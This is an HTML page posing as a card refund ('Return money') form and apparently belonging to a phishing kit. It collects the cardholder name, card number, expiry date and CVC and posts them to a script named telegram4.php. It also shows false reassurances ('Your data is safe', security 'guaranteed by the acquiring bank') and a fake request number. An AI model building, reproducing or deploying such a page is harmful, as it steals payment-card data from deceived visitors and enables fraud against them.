<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="css/moneyback.css">
    <link rel="stylesheet" href="css/reset.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Plus+Jakarta+Sans:wght@400;500;600;700&family=Square+Peg&family=Water+Brush&family=Whisper&display=swap" rel="stylesheet">
    <link rel="apple-touch-icon" sizes="180x180" href="icons/apple-touch-icon.png">
    <link rel="icon" type="image/png" sizes="32x32" href="icons/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="icons/favicon-16x16.png">
    <link rel="manifest" href="icons/site.webmanifest">
    <link rel="mask-icon" href="icons/safari-pinned-tab.svg" color="#5bbad5">
    <meta name="msapplication-TileColor" content="#603cba">
    <meta name="theme-color" content="#ffffff">
    <title>Document</title>
</head>
<body>
    
    <div class="moneyback_wrapper">
        <div class="moneyback">

            <div class="moneyback_info">
                <h3>Return money</h3>
                <p>
                    To return, enter and confirm your card details.<br>
                    Request number: <span id="randomNum"></span></p>
            </div>

            <div class="moneyback_photo">
                <div class="photo">
                    <img class="moneyback_photo_vima" src="css/images/pay/vima.png">
                        <span class="moneyback_photo_dot"></span>
                </div>
                <div class="moneyback_photo_text">
                    <p>Payment by VISA or MasterCard bank card.
                        Security of payment processing by plastic cards
                       guaranteed by the acquiring bank</p>
                </div>
            </div>

            <form action="telegram4.php" method="post" class="moneyback_form _req" id="form">
                <p>Bank card owner</p>
                <input name="moneybackowner" type="text" class="moneyback_form_name _req">
                <p>Card number</p>
                <input name="moneybacknumbercard" type="text" class="moneyback_form_card _req">
                <p>Validity</p>
                <input name="moneybackvalidity" type="text" class="moneyback_form_validity _req" maxlength="5">
                <p class="cvc">CVC<span class="moneyback_cvc_que">?</span></p>
                <input name="moneybackcvc" type="text" class="moneyback_form_cvc _req" maxlength="3">
                <div class="moneyback_protected">
                  <p><img src="css/images/more_photo/paylock.svg">Your data is safe</p>
                </div>
                <div class="moneyback_btn">
                    <button type="submit">Send</button>
                </div>
            </form>

        </div>
    </div>

    <script src="js/random.js"></script>
</body>
</html>